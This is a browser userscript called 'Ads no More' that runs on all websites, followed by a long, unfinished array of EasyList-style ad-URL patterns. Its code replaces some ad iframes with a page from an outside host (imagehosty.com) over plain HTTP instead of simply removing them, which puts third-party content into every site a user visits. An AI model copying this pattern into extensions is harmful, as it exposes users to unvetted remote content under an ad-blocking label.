// ==UserScript==
// @name Ads no More
// @description Ads no more. Replace ads in page for clean space.  Make your web clean
// @version 1.1
// @namespace	    Mceme
// @ License
// All rights Reserved
// Author mceme
// @include	http://*/*
// @include	https://*/*
// @include         https://*.facebook.com/*
// @include         https://*.facebook.com/*/*
// @include         http://*.facebook.com/*
// @include         http://*.facebook.com/*/*
// ==/UserScript==
var element = document.getElementById('aswift_0');
if (element) {
document.getElementById( 'aswift_0' ).setAttribute( 'src', 'http://imagehosty.com/scripts/adsnomore.html' );
document.getElementById( 'aswift_0' ).setAttribute( 'load', '' );
}
var element2 = document.getElementById('aswift_1');
if (element2) {
document.getElementById( 'aswift_1' ).setAttribute( 'src', 'http://imagehosty.com/scripts/adsnomore.html' );
document.getElementById( 'aswift_1' ).setAttribute( 'load', '' );
}
var element3 = document.getElementById('aswift_2');
if (element3) {
document.getElementById( 'aswift_2' ).setAttribute( 'src', 'http://imagehosty.com/scripts/adsnomore.html' );
document.getElementById( 'aswift_2' ).setAttribute( 'load', '' );
}
var element4 = document.getElementById('aswift_3');
if (element4) {
document.getElementById( 'aswift_3' ).setAttribute( 'src', '' );
document.getElementById( 'aswift_3' ).setAttribute( 'load', '' );
}
var element5 = document.getElementById('aswift_4');
if (element5) {
document.getElementById( 'aswift_4' ).setAttribute( 'src', '' );
document.getElementById( 'aswift_4' ).setAttribute( 'load', '' );
}
var i=0;
while(div=document.getElementsByTagName('iframe')[i++]){
if(div.id.match(/google_ads/)){

document.getElementById( div.id ).setAttribute( 'src', 'http://imagehosty.com/scripts/adsnomore.html' );
document.getElementById( div.id ).setAttribute( 'load', '' );
}
}
var j=0;
while(div=document.getElementsByTagName('iframe')[j++]){
if(div.id.match(/adframe/)){

document.getElementById( div.id ).setAttribute( 'src', '' );
document.getElementById( div.id ).setAttribute( 'load', '' );
}
}

 // if (window.XMLHttpRequest)
// {// code for IE7+, Firefox, Chrome, Opera, Safari
    // var xmlhttp=new XMLHttpRequest();
// }
// else
// {// code for IE6, IE5
    // var xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
// }
// xmlhttp.open("GET","chrome://compileduserscript/content/easylist.txt",false);
// xmlhttp.send();

 // if(req.status == 200) {
 // var text=xmlhttp.responseText;
 // }
var text=["\&ad_channel\=",
"\&ad_classid\=",
"\&ad_keyword\=",
"\&ad_type_",
"\&ad_zones\=",
"\&adbannerid\=",
"\&adcount\=",
"\&admeld_",
"\&adname\=",
"\&adpageurl\=",
"\&adsafe\=",
"\&adserver\=",
"\&adsize\=",
"\&adslot\=",
"\&adslots\=",
"\&adspace\=",
"\&adunit\=",
"\&adurl\=",
"\&adv_keywords\=",
"\&advertiserid\=",
"\&advtile\=",
"\&customSizeAd\=",
"\&googleadword\=",
"\&jumpstartadformat\=",
"\&largead\=",
"\&popunder\=",
"\&program\=revshare\&",
"\&prvtof\=\*\&poru\=",
"\&simple_ad_",
"\&smallad\=",
"\&type\=ad\&",
"\&video_ads_",
"\&videoadid\=",
"\&view\=ad\&",
"advertorial\.",
"\\+adverts/",
"\-2/ads/",
"\-300x100ad2\.",
"\-ad\-001\-",
"\-ad\-340x400\-",
"\-ad\-bottom\-",
"\-ad\-exo\-",
"\-ad\-iframe/",
"\-ad\-large\.",
"\-ad\-limits\.",
"\-ad\-loading\.",
"\-ad\-manager/$~stylesheet",
"\-ad\-server/",
"\-ad\-tile\.",
"\-ad\-util\-",
"\-ad\-util\.",
"\-ad\-vertical\-",
"\-ad\-zone\.",
"\-ad1\.",
"\-ad2\.",
"\-ad3\.",
"\-ad_125x125\.",
"\-ad_leaderboard/",
"\-adcentre\.",
"\-adhelper\.",
"adimage\-",
"\-adrotation\.",
"\-ads\-management/",
"\-ads\-manager/",
"\-ads/728x",
"\-ads/oas/",
"\-ads_9_3\.",
"\-adserver\-",
"\-adserver/",
"\-adspot\-",
"\-adsystem\-",
"\-adv\-v1/",
"\-advert3\.",
"\-advertisement\.",
"\-article\-ads\-",
"\-banner\-ad",
"\-bannerads/",
"\-bin/ad_",
"\-content\-ad\.",
"\-contest\-ad\.",
"\-cpm\-ad\.",
"\-cpm\-ads\.",
"\-games/ads/",
"\-google\-ads/",
"\-iframe\-ads/",
"\-images/ad\-",
"\-img/ads/",
"\-inspire\-ad\.",
"\-layer\-ads/",
"\-leaderboard\-ad\-",
"\-panel_ad_",
"\-permads\.",
"\-pop\-under/",
"\-popup\-ad\.",
"\-popup\-ads\-",
"\-show\-ads\.",
"\-skyscrapper160x600\.",
"\-text\-ads\.",
"\-third\-ad\.",
"\-webad1\.",
"\.1d/ads/",
"\.a3s\?n\=\*\&zone_id\=",
"\.ad\-cloud\.",
"\.ad\-traffic\.",
"\.ad\.final\.",
"\.ad\.footer\.",
"\.ad\.page\.",
"\.ad\.premiere\.",
"\.admarvel\.",
"\.adpartner\.",
"\.adplacement\=",
"\.adresult\.",
"\.adriver\.$~object\-subrequest",
"\.ads\-tool\.",
"\.ads\.darla\.",
"\.ads\.loader\-",
"\.adsbox\.",
"\.adsense\.",
"\.adserv/",
"\.adserver\.",
"\.adserver1\.",
"\.adspace\.",
"\.adsremote\.",
"/ad_iframe_",
"/ad_img\.",
"/ad_img/\*",
"/ad_include\.",
"/ad_insert\.",
"/ad_jnaught/\*",
"/ad_label_",
"/ad_leader\.",
"/ad_leaderboard\.",
"/ad_left\.",
"/ad_legend_",
"/ad_link\.",
"/ad_load\.",
"/ad_log_",
"/ad_manager\.",
"/ad_manager/\*",
"/ad_mpu\.",
"/ad_navigbar_",
"/ad_notice\.",
"/ad_oas/\*",
"/ad_page_",
"/ad_policy\.",
"/ad_pop1\.",
"/ad_print\.",
"/ad_rectangle_",
"/ad_refresher\.",
"/ad_reloader_",
"/ad_request\.",
"/ad_right\.",
"/ad_rotation\.",
"/ad_rotator\.",
"/ad_rotator_",
"/ad_script\.",
"/ad_serv\.",
"/ad_serve\.",
"/ad_serve_",
"/ad_server\.",
"/ad_server/\*",
"/ad_sizes\=",
"/ad_skin_",
"/ad_sky\.",
"/ad_skyscraper\.",
"/ad_slideout\.",
"/ad_space\.",
"/ad_spot\.",
"/ad_square\.",
"/ad_square_",
"/ad_supertile/\*",
"/ad_sys/\*",
"/ad_syshome\.",
"/ad_tag\.",
"/ad_tag_",
"/ad_tags_",
"/ad_tile/\*",
"/ad_title_",
"/ad_top\.",
"/ad_topgray2\.",
"/ad_tpl\.",
"/ad_upload/\*",
"/ad_utils/\*",
"/ad_ver/\*",
"/ad_vert\.",
"/ad_vertical\.",
"/ad_view_",
"/adaffiliate_",
"/adanim/\*",
"/adaptvadplayer\.",
"/adbanner\.",
"/adbanner/\*",
"/adbanner_",
"/adbanners/\*",
"/adbar\.",
"/adbars\.",
"/adbase\.",
"/adbeacon\.",
"/adbetween/\*",
"/adbg\.jpg",
"/adblock\.ash",
"/adbot_",
"/adbottom\.",
"/adbox\.",
"/adbox/\*",
"/adboxbk\.",
"/adboxes/\*",
"/adbrite\.",
"/adbureau\.",
"/adbytes\.",
"/adcampaigns/\*",
"/adcde\.js",
"/adcdn\.",
"/adcell/\*",
"/adcentral\.",
"/adchain\-",
"/adchannel_",
"/adchoice\.",
"/adchoices\.",
"/adclick\.",
"/adclick/\*",
"/adclient\-",
"/adclient\.",
"/adclient/\*",
"/adclutter\.",
"/adcode\.",
"/adcode/\*",
"/adcodes/\*",
"/adcollector\.",
"/adcomponent/\*",
"/adconfig\.js",
"/adconfig\.xml\?",
"/adconfig/\*",
"/adcontainer\?",
"/adcontent\.$~object\-subrequest",
"/adcontent/\*",
"/adcontrol\.",
"/adcontroller\.",
"/adcore\.",
"/adcore_",
"/adcounter\.",
"/adcreative\.",
"/adcycle\.",
"/adcycle/\*",
"/addatasandbox\?",
"/addeals/\*",
"/addelivery/\*",
"/addyn/3\.0/\*",
"/addyn|\*;adtech;",
"/addyn|\*|adtech;",
"/adengage\-",
"/adengage\.",
"/adengage/\*",
"/adengage1\.",
"/adengage2\.",
"/adengage3\.",
"/adengage4\.",
"/adengage5\.",
"/adengage6\.",
"/adengage_",
"/adengine/\*",
"/adexclude/\*",
"/adexternal\.",
"/adf\.cgi\?",
"/adfactory\.",
"/adfarm\.",
"/adfeedtestview\.",
"/adfetch\?",
"/adfetcher\?",
"/adfever_",
"/adfile/\*",
"/adfillers/\*",
"/adfly/\*",
"/adfooter\.",
"/adformats/\*",
"/adframe\.",
"/adframe/\*",
"/adframe2\.",
"/adframe\?",
"/adframe_",
"/adframebottom\.",
"/adframecommon\.",
"/adframemiddle\.",
"/adframetop\.",
"/adfrequencycapping\.",
"/adfshow\?",
"/adfunction\.",
"/adfunctions\.",
"/adgallery1\.",
"/adgallery1|",
"/adgallery2\.",
"/adgallery2|",
"/adgallery3|",
"/adgalleryheader\.",
"/adgearsegmentation\.",
"/adgeo/\*",
"/adgitize\-",
"/adgooglefull2\.",
"/adgraphics/\*",
"/adguru\.",
"/adhalfbanner\.",
"/adhandler\.",
"/adhandler/\*$~subdocument",
"/adheader\.",
"/adheadertxt\.",
"/adhints/\*",
"/adhomepage\.",
"/adhtml/\*",
"/adhub\.",
"/adhug_",
"/adicon_",
"/adiframe\.",
"/adiframe/\*",
"/adiframe\?",
"/adiframeanchor\.",
"/adiframem1\.",
"/adiframem2\.",
"/adiframetop\.",
"/adify_",
"/adimage\.",
"/adimages\.",
"/adimages/\*$~subdocument",
"/adimg\.",
"/adimg/\*",
"/adindex/\*",
"/adinject\.",
"/adinjector\.",
"/adinjector_",
"/adinsert\.",
"/adinsertionplugin\.",
"/adinterax\.",
"/adiro\.",
"/adition\.",
"/adjs\.",
"/adjs_",
"/adjsmp\.",
"/adlabel\.",
"/adlabel_",
"/adlayer\.",
"/adlayer/\*",
"/adleader\.",
"/adleaderboardtop\.",
"/adleft/\*",
"/adleftsidebar\.",
"/adlink\-",
"/adlink\.",
"/adlink/\*",
"/adLink728\.",
"/adlink_",
"/adlinks\.",
"/adlist_",
"/adloader\.",
"/adm/ad/\*",
"/admain|",
"/adman\.",
"/adman/\*",
"/admanagement/\*",
"/admanagementadvanced\.",
"/admanager\.$~object\-subrequest",
"/admanager/\*$~object\-subrequest",
"/admanager3\.",
"/admanagers/\*",
"/admanagerstatus/\*",
"/admantx\-",
"/admantx\.",
"/admantx/\*",
"/admarker\.",
"/admarker_",
"/admarket/\*",
"/admaster\.",
"/admaster\?",
"/admatch\-",
"/admatcher\.",
"/admaxads\.",
"/admeasure\.",
"/admedia\.",
"/admedia/\*",
"/admega\.",
"/admeld\.",
"/admeld/\*",
"/admeld_",
"/admentor/\*",
"/admentorasp/\*",
"/admentorserve\.",
"/admeta\.",
"/admez\.",
"/admez/\*",
"/admicro2\.",
"/admicro_",
"/admin/banners/\*",
"/adminibanner2\.",
"/admixer_",
"/adnet\.",
"/adnetmedia\.",
"/adnetwork\.",
"/adnetwork300\.",
"/adnetwork468\.",
"/adnews\.",
"/adnext\.",
"/adng\.html",
"/adnotice\.",
"/adonline\.",
"/adops/\*",
"/ados\.js",
"/adotubeplugin\.",
"/adoverlay/\*",
"/adp\.htm",
"/adpage\.",
"/adpage/\*",
"/adpan/\*",
"/adpartner\.",
"/adpeeps\.",
"/adpeeps/\*",
"/adpicture1|",
"/adpicture2|",
"/adpictures/\*",
"/adplacement\.",
"/adplayer\.",
"/adplayer/\*",
"/adplugin\.",
"/adplugin_",
"/adpoint\.",
"/adpool/\*",
"/adpop\.",
"/adpopup\.",
"/adproducts/\*",
"/adprovider\.",
"/adproxy\.",
"/adproxy/\*",
"/adreactor/\*",
"/adrefresh\-",
"/adrelated\.",
"/adreload\?",
"/adremote\.",
"/adrequest\.",
"/adrevenue/\*",
"/adrevolver/\*",
"/adright/\*",
"/adriver\.$~object\-subrequest",
"/adriver_$~object\-subrequest",
"/adrobot\.",
"/adrolays\.",
"/adRoll\.",
"/adroller\.",
"/adroot/\*",
"/adrot\.",
"/adrot_",
"/adrotate\.",
"/adrotate/\*",
"/adrotator\.",
"/adrotator/\*",
"/adrotv2\.",
"/adruptive\.",
"/ads\-1\.",
"/ads\-banner",
"/ads\-blogs\-",
"/ads\-common\.",
"/ads\-footer\.",
"/ads\-leader|",
"/ads\-pd\.",
"/ads\-rectangle\.",
"/ads\-rec|",
"/ads\-right\.",
"/ads\-sa\.",
"/ads\-scroller\-",
"/ads\-segmentjs\.",
"/ads\-service\.",
"/ads\-skyscraper\.",
"/ads\-sky|",
"/ads\.asp\?",
"/ads\.dll/\*",
"/ads\.gif",
"/ads\.htm",
"/ads\.jsp",
"/ads\.php",
"/ads\.pl\?",
"/ads/125l\.",
"/ads/125r\.",
"/ads/160\.",
"/ads/2010/\*",
"/ads/300\.",
"/ads/3002\.",
"/ads/468a\.",
"/ads/728\.",
"/ads/728b\.",
"/ads/ad_",
"/ads/ads\.",
"/ads/ads_",
"/ads/advshow\.",
"/ads/banner\.",
"/ads/banner01\.",
"/ads/banners/\*",
"/ads/center\-",
"/ads/cnvideo/\*",
"/ads/common/\*",
"/ads/default_",
"/ads/dhtml/\*",
"/ads/footer_",
"/ads/freewheel/\*",
"/ads/generatedHTML/\*",
"/ads/google1\.",
"/ads/google2\.",
"/ads/header_",
"/ads/home/\*",
"/ads/homepage/\*",
"/ads/house/\*",
"/ads/iframe",
"/ads/images/\*",
"/ads/img/\*",
"/ads/indexsponsors/\*",
"/ads/interstitial\.",
"/ads/interstitial/\*",
"/ads/js/\*",
"/ads/js_",
"/ads/jsbannertext\.",
"/ads/labels/\*",
"/ads/layer\.",
"/ads/leaderboard\-",
"/ads/leaderboard\.",
"/ads/leaderboard_",
"/ads/load\.",
"/ads/main\.",
"/ads/mpu/\*",
"/ads/panel\.",
"/ads/pencil/\*",
"/ads/player\-",
"/ads/plugs/\*",
"/ads/popshow\.",
"/ads/post\-",
"/ads/preloader/\*",
"/ads/preroll_",
"/ads/promo_",
"/ads/proxy\-",
"/ads/rail\-",
"/ads/rectangle_",
"/ads/ringtone_",
"/ads/show\.",
"/ads/side\-",
"/ads/skins/\*",
"/ads/sponsor",
"/ads/square\-",
"/ads/square\.",
"/ads/square2\.",
"/ads/square3\.",
"/ads/third\-",
"/ads/tile\-",
"/ads/top\-",
"/ads/video_",
"/ads/view\.",
"/ads/zone/\*",
"/ads0\.",
"/ads09a/\*",
"/ads1\.",
"/ads1/\*",
"/ads10/\*",
"/ads11/\*",
"/ads160\.",
"/ads18\.",
"/ads2\.",
"/ads2/\*",
"/ads2012/\*",
"/ads2012b/\*",
"/ads2_",
"/ads3\.",
"/ads3/\*",
"/ads4\.",
"/ads4/\*",
"/ads468\.",
"/ads5\.",
"/ads5/\*",
"/ads6\.",
"/ads6/\*",
"/ads7\.",
"/ads7/\*",
"/ads728\.",
"/ads8\.",
"/ads8/\*",
"/ads88\.",
"/ads9\.",
"/ads9/\*",
"/ads\?id\=",
"/ads\?zone_id\=",
"/ads_160_",
"/ads_banners/\*",
"/ads_code\.",
"/ads_code_",
"/ads_config\.",
"/ads_display\.",
"/ads_files/\*",
"/ads_footer\.",
"/ads_gallery/\*",
"/ads_global\.",
"/ads_google\.",
"/ads_ifr\.",
"/ads_iframe\.",
"/ads_load/\*",
"/ads_loader\.",
"/ads_openx_",
"/ads_patron\.",
"/ads_php/\*",
"/ads_reporting/\*",
"/ads_server_",
"/ads_sidebar\.",
"/ads_yahoo\.",
"/adsa468\.",
"/adsa728\.",
"/adsadview\.",
"/adsales/\*",
"/adsame\.",
"/adsatt\.",
"/adsbanner\.",
"/adsbanner/\*",
"/adsbannerjs\.",
"/adsbox\.",
"/adsby\.",
"/adscale\.",
"/adscale1\.",
"/adscale_",
"/adscalebigsize\.",
"/adscalecontentad\.",
"/adscaleskyscraper\.",
"/adscluster\.",
"/adscontent\.",
"/adscontent2\.",
"/adscript\.",
"/adscript1\.",
"/adscript_",
"/adscripts/\*",
"/adscripts1\.",
"/adscripts2\.",
"/adscripts3\.",
"/adscroll\.",
"/adsdaq_",
"/adsdaqbanner_",
"/adsdaqbox_",
"/adsdaqsky_",
"/adsdyn160x160\.",
"/adsegmentation\.",
"/adsenceSearch\.",
"/adsenceSearchTop\.",
"/adsense\-",
"/adsense\.",
"/adsense/\*",
"/adsense1\.",
"/adsense2\.",
"/adsense23\.",
"/adsense24\.",
"/adsense3\.",
"/adsense4\.",
"/adsense5\.",
"/adsense\?",
"/adsense_",
"/AdsenseBlockView\.",
"/adsensegb\.",
"/adsensegoogle\.",
"/adsensets\.",
"/adseo\.",
"/adseo/\*",
"/adserv\.",
"/adserv/\*",
"/adserv1\.",
"/adserv2\.",
"/adserv3\.",
"/adserv_",
"/adserve\.",
"/adserve/\*",
"/adserve_",
"/adserver\.",
"/adserver/\*",
"/adserver1\.",
"/adserver2\.",
"/adserver2/\*",
"/adserver3\.",
"/adserver7/\*",
"/adserver8strip\.",
"/adserver\?",
"/adserver_",
"/adservers\-",
"/adserversolutions/\*",
"/adservices/\*",
"/adservice|",
"/adserving\.",
"/adserving/\*",
"/adserving_",
"/adserv|\*|adtech;",
"/adsetup\.",
"/adsfac\.",
"/adsfetch\.",
"/adsfile\.",
"/adsfiles\.",
"/adsfinal\.",
"/adsfolder/\*",
"/adsframe\.",
"/adshandler\.",
"/adshare/\*",
"/adshare3\.",
"/adsheader\.",
"/adshow\.",
"/adshow\?",
"/adshow_",
"/adsidebarrect\.",
"/adsiframe/\*",
"/adsimage/\*",
"/adsImg/\*",
"/adsinclude\.",
"/adsinsert\.",
"/adskin/\*",
"/adsky\.",
"/adskyright\.",
"/adskyscraper\.",
"/adsline\.",
"/adslots\.",
"/adslug\-",
"/adslug_",
"/adslugs/\*",
"/adsmanagement/\*",
"/adsmanager/\*",
"/adsmedia_",
"/adsmm\.dll/\*",
"/adsnew\.",
"/adsnip\.",
"/adsniptrack\.",
"/adsonar\.",
"/adsopenx/\*",
"/adspace\.",
"/adspace/\*",
"/adspeeler/\*",
"/adsponsor\.",
"/adspot\.",
"/adspots/\*",
"/adspro/\*",
"/adsquare\.",
"/adsquareleft\.",
"/adsrc\.",
"/adsremote\.",
"/adsreporting/\*",
"/adsrich\.",
"/adsright\.",
"/adsrot\.",
"/adsrot2\.",
"/adsrotate\.",
"/adsrotate1left\.",
"/adsrotate1right\.",
"/adsrotate2left\.",
"/adsrotateheader\.",
"/adsrule\.",
"/adsrv\.",
"/adsrv/\*",
"/adsserv\.",
"/adssrv\.",
"/adstacodaeu\.",
"/adstatic\.",
"/adstemplate/\*",
"/adstop_",
"/adstorage\.",
"/adstracking\.",
"/adstream\.",
"/adstream_",
"/adstrm/\*",
"/adstub\.",
"/adstubs/\*",
"/adsup\.",
"/adsvr\.",
"/adswap\.",
"/adswap/\*",
"/adswide\.",
"/adswidejs\.",
"/adsword\.",
"/adswrapper\.",
"/adswrapperintl\.",
"/adsx728\.",
"/adsx_728\.",
"/adsync/\*",
"/adsyndication\.",
"/adsyndication/\*",
"/adsys\.",
"/adsys/\*",
"/adsystem/\*",
"/adtable_",
"/adtag\.",
"/adtag/\*",
"/adtaggingsubsec\.",
"/adtago\.",
"/adtags\.",
"/adtags/\*",
"/adtagtc\.",
"/adtagtranslator\.",
"/adtech\.",
"/adtech/\*",
"/adtech;",
"/adtech_",
"/adtechglobalsettings\.js",
"/adtest\.",
"/adtext\.",
"/adtext4\.",
"/adtext_",
"/adtextmpu2\.",
"/adtitle\.",
"/adtology\.",
"/adtonomy\.",
"/adtool/\*",
"/adtools/\*",
"/adtools2\.",
"/adtop\.",
"/adtopleft\.",
"/adtopright\.",
"/adtrack\.",
"/adtrack/\*",
"/adtraff\.",
"/adttext\-",
"/adttext\.",
"/adtvideo\.",
"/adtxt\.",
"/adtype\.",
"/adunit\.",
"/adunit/\*",
"/adunits/\*",
"/adutil\.",
"/adv\-banner\.",
"/adv\-div\-",
"/adv\.asp",
"/adv\.htm",
"/adv\.jsp",
"/adv/ads/\*",
"/adv/managers/\*",
"/adv/preroll_",
"/adv02\.",
"/adv03\.",
"/adv1\.",
"/adv2\.",
"/adv3\.",
"/adv4\.",
"/adv5\.",
"/adv_2\.",
"/adv_background/\*",
"/adv_flash\.",
"/adv_frame/\*",
"/adv_link\.",
"/advaluewriter\.",
"/advbanner/\*",
"/advcontents\.",
"/adver\.",
"/adver_hor\.",
"/adverserve\.",
"/advert\-",
"/advert\.",
"/advert/\*",
"/advert\?",
"/advert_",
"/advertbanner\.",
"/advertbox\.",
"/advertise\-",
"/advertise\.",
"/advertise/\*",
"/advertise125x125\.",
"/advertise_",
"/advertisehere\.",
"/advertisement\-",
"/advertisement\.",
"/advertisement/\*",
"/advertisement160\.",
"/advertisement2\.",
"/advertisement_",
"/advertisementheader\.",
"/advertisementrotation\.",
"/advertisements\.",
"/advertisements/\*",
"/advertisementview/\*",
"/advertiser\.",
"/advertiser/\*",
"/advertisers/\*",
"/advertising\-",
"/advertising\.",
"/advertising/\*",
"/advertising2\.",
"/advertising_",
"/advertisingbanner\.",
"/advertisingbanner/\*",
"/advertisingcontent/\*",
"/advertisingmanual\.",
"/advertisingmodule\.",
"/advertisings\.",
"/advertisingwidgets/\*",
"/advertisment\-",
"/advertisment\.",
"/advertisment/\*",
"/advertisments/\*",
"/advertize_",
"/advertlayer\.",
"/advertmedia/\*",
"/advertorial/\*",
"/advertorial_",
"/advertorials/\*",
"/advertphp/\*",
"/advertpro/\*",
"/advertright\.",
"/adverts\.",
"/adverts/\*",
"/adverts_",
"/advertsky\.",
"/adview\.",
"/adview\?",
"/adviewer\.",
"/advision\.",
"/advolatility\.",
"/advpartnerinit\.",
"/advrotator\.",
"/advzones/\*",
"/adweb2\.",
"/adwords/\*",
"/adwordstracking\.js",
"/adworks\.",
"/adworks/\*",
"/adworx\.",
"/adworx_",
"/adwrapper/\*",
"/adwrapperiframe\.",
"/adx\.",
"/adx/ads\?",
"/adx_flash\.",
"/adxsite\.",
"/adxx\.php\?",
"/adyard\.",
"/adyard300\.",
"/adzone\.",
"/adzone4\.",
"/adzone_",
"/AdZoneAdXp\.",
"/adzonebottom\.",
"/adzoneleft\.",
"/adzoneplayerright\.",
"/adzoneright\.",
"/adzones/\*",
"/adzonetop\.",
"/afc\-match\?q\=",
"/afcads\.",
"/afcsearchads\.",
"/aff/ads_",
"/aff/images/\*",
"/aff_ad\?",
"/aff_frame\.",
"/affad\?",
"/affads/\*",
"/affclick/\*",
"/affilatebanner\.",
"/affiliate\-content/\*",
"/affiliate/ads/\*",
"/affiliate/banners/\*",
"/affiliate/script\.php\?",
"/affiliate/scripts/\*",
"/affiliate_banner/\*",
"/affiliate_banners/\*",
"/affiliate_resources/\*",
"/affiliate_show_banner\.",
"/affiliate_show_iframe\.",
"/affiliateads/\*",
"/affiliateadvertisement\.",
"/affiliatebanner/\*",
"/affiliatebanners/\*",
"/affiliateimages/\*",
"/affiliatelinks\.",
"/affiliates\.\*\.aspx\?",
"/affiliates/banners/\*",
"/affiliatetags/\*",
"/affiliatewiz/\*",
"/affiliation/\*",
"/affiliationcash\.",
"/affilinet/\*",
"/affimages/\*",
"/affimg/\*",
"/affpic/\*",
"/afimages\.",
"/afr\.php\?",
"/afr\?auid\=",
"/ajax/ads/\*",
"/ajaxads\.",
"/ajrotator/\*",
"/ajs\.php\?",
"/ajs\?auid\=",
"/all_ads/\*",
"/alternet\.ad\?",
"/api/ads/\*",
"/app/ads\.js",
"/article_ad\.",
"/aseadnshow\.",
"/aspbanner_inc\.asp\?",
"/assets/ads/\*",
"/audioads/\*",
"/auditudeadunit\.",
"/austria_ad\.",
"/auto_ad_",
"/avw\.php\?zoneid\=\*\&cb\=",
"/back\-ad\.",
"/ban_ad\.",
"/ban_m\.php\?",
"/banimpress\.",
"/banman\.asp\?",
"/banman/\*",
"/banner\-ad\-",
"/banner\-ad/\*",
"/banner\.php",
"/banner/ad\.",
"/banner/ad_",
"/banner/affiliate/\*",
"/banner468\.",
"/banner468_",
"/banner_468\.",
"/banner_ad\.",
"/banner_ad_",
"/banner_ads\.",
"/banner_ads/\*",
"/banner_ads_",
"/banner_zanox/\*",
"/bannerad\.",
"/bannerad/\*",
"/bannerad1\-",
"/bannerad2\-",
"/bannerad3\.",
"/bannerad6\.",
"/bannerad_",
"/bannerads\-",
"/bannerads\.",
"/bannerads/\*",
"/banneradverts/\*",
"/banneradviva\.",
"/bannercode\.php",
"/bannerconduit\.",
"/bannerexchange/\*",
"/bannerfarm\.",
"/bannerfarm/\*",
"/bannerframe\.\*\?",
"/bannerframeopenads\.",
"/bannerframeopenads_",
"/bannermanager/\*",
"/bannerrotater/\*",
"/bannerrotation\.",
"/bannerrotation/\*",
"/banners\.\*\&iframe\=",
"/banners/ad10\.",
"/banners/ad11\.",
"/banners/ad_",
"/banners/ads\-",
"/banners/adv_",
"/banners/affiliate/\*",
"/banners/promo/\*",
"/banners_rotation\.",
"/bannerscript/\*",
"/bannerserve/\*",
"/bannerserver/\*",
"/bannerserver3/\*",
"/bannerserver3|",
"/bannersyndication\.",
"/bannerview\.\*\?",
"/bannery/\*\?banner\=",
"/bar\-ad\.",
"/baselinead\.",
"/basic/ad/\*",
"/bbad\.",
"/bbad1\.",
"/bbad10\.",
"/bbad2\.",
"/bbad3\.",
"/bbad4\.",
"/bbad5\.",
"/bbad6\.",
"/bbad7\.",
"/bbad8\.",
"/bbad9\.",
"/bckgrnd_ad\.",
"/behaviorads/\*",
"/beta\-ad\.",
"/betrad\.js",
"/bftv/ads/\*",
"/bg/ads/\*",
"/bg_ads_",
"/bi_affiliate\.js",
"/bigad\.",
"/bigads/\*",
"/bigboxad\.",
"/bkgrndads/\*",
"/blockad_",
"/blocks/ads/\*",
"/blog_ads/\*",
"/blogad_",
"/blogads\.",
"/blogads/\*",
"/blogads3/\*",
"/blogoas\-",
"/bmndoubleclickad\.",
"/bnrsrv\.",
"/bodyads/\*",
"/boomad\.",
"/bottom\-ad\-",
"/bottom\-advert\-",
"/bottom_ad\.",
"/bottomad\.",
"/bottomad/\*",
"/bottomads\.",
"/boxad\.",
"/boxad1\.",
"/boxad2\.",
"/boxad3\.",
"/boxad_",
"/breakad_",
"/btmads\.",
"/btmadsx\.",
"/btn_ad_",
"/bucketads\.",
"/buddyw_ad\.",
"/butler\.php\?type\=",
"/button_ads/\*",
"/buttonads\.",
"/buttonads/\*",
"/buyad\.",
"/buyclicks/\*",
"/buysellads\.",
"/bytemark_ad\.",
"/cads\-min\.js",
"/call/pubif/\*",
"/callads5\.",
"/camfuzeads/\*",
"/campus/ads/\*",
"/carbonads/\*",
"/carsadtaggenerator\.js",
"/cashad\.",
"/cashad2\.",
"/central/ads/\*",
"/cgi\-bin/ads/\*",
"/channelblockads\.",
"/chinaadclient\.",
"/chitika\-ad\?",
"/circads\.",
"/cjadsprite\.",
"/clickboothad\.",
"/cms/ads/\*",
"/cms/js/ad_",
"/cnnslads\.",
"/cnxad\-",
"/coldseal_ad\.",
"/columnads/\*",
"/comment\-ad\-",
"/comment\-ad\.",
"/commercial_horizontal\.",
"/commercial_top\.",
"/common/ad\.",
"/common/ad/\*",
"/common/ads/\*",
"/commspace_ad\.",
"/companion_ads\.",
"/components/ads/\*",
"/configspace/ads/\*",
"/contaxe_",
"/content/ad/\*",
"/content/ad_",
"/content/ads/\*",
"/content_ad\.",
"/content_ad_",
"/contentAd\.",
"/contentad/\*",
"/contentad_",
"/contentadxxl\.",
"/contentad|",
"/contextad\.",
"/contribute_ad\.",
"/controller/ads/\*",
"/controllerimg/adv/\*",
"/convertjsontoad\.",
"/core/ads/\*",
"/corner_ads/\*",
"/country_ad\.",
"/cpm_ad\.",
"/cpmcampaigns/\*",
"/cpxads\.",
"/css/adsense",
"/ctamlive160x160\.",
"/cube_ads/\*",
"/cubead\.",
"/custads/\*",
"/custom/ads",
"/custom11x5ad\.",
"/custom_ads/\*",
"/customad\.",
"/customadmode\.",
"/customads/\*",
"/customadsense\.",
"/customcontrols/ads/\*",
"/customerad_",
"/cutead\.",
"/cvs/ads/\*",
"/cwggoogleadshow\.",
"/daily/ads/\*",
"/dart\-zones\.js",
"/dart_ads/\*",
"/dartadengine\.",
"/dartads\.",
"/data/ads/\*",
"/dateads\.",
"/dclk_ads\.",
"/dclk_ads_",
"/dcloadads/\*",
"/ddlads/\*",
"/de/ads/\*",
"/default\-adv/\*",
"/default_ads/\*",
"/defer_ads\.",
"/deferads\.",
"/deliver\.nmi\?",
"/deliverad/\*",
"/deliverads\.",
"/deliverjs\.nmi\?",
"/delivery\.ads\.",
"/delivery\.php\?banner_id\=",
"/delivery\.php\?rnd\=",
"/delivery/\*\?advplaces\=",
"/delivery/ag\.php",
"/delivery/al\.php",
"/delivery/apu\.php",
"/delivery/avw\.php",
"/delivery/vbafr\.php",
"/descpopup\.js",
"/dfpads\.",
"/dfpsearchads\.",
"/direct_ads\.",
"/directads\.",
"/display\-ad/\*",
"/display\-ads\-",
"/display_ad",
"/displayad\.",
"/displayad\?",
"/displayadbanner_",
"/displayadiframe\.",
"/displayads/\*",
"/dne_ad\.",
"/dns_ad/\*",
"/dnsads\.",
"/doors/ads/\*",
"/doubleclick\.js",
"/doubleclick\.php",
"/doubleclick/iframe\.",
"/doubleclick_ads\.",
"/doubleclick_ads/\*",
"/doubleclickads\?",
"/doubleclickcontainer\.",
"/doubleclickinstreamad\.",
"/doubleclicktag\.",
"/download/ad\.",
"/download/ad/\*",
"/download/ads/\*",
"/drawad\.",
"/drivingrevenue/\*",
"/dsg/bnn/\*",
"/dspads\.",
"/dtiadvert125x125\.",
"/dxd/ads/\*",
"/dyn_banner\.",
"/dyn_banners_",
"/dynamic\-ad\-",
"/dynamic/ads/\*",
"/dynamic_ads/\*",
"/dynamicad\?",
"/dynamiccsad\?",
"/dynamicvideoad\?",
"/dynanews/ad\-",
"/dynbanner/flash/\*",
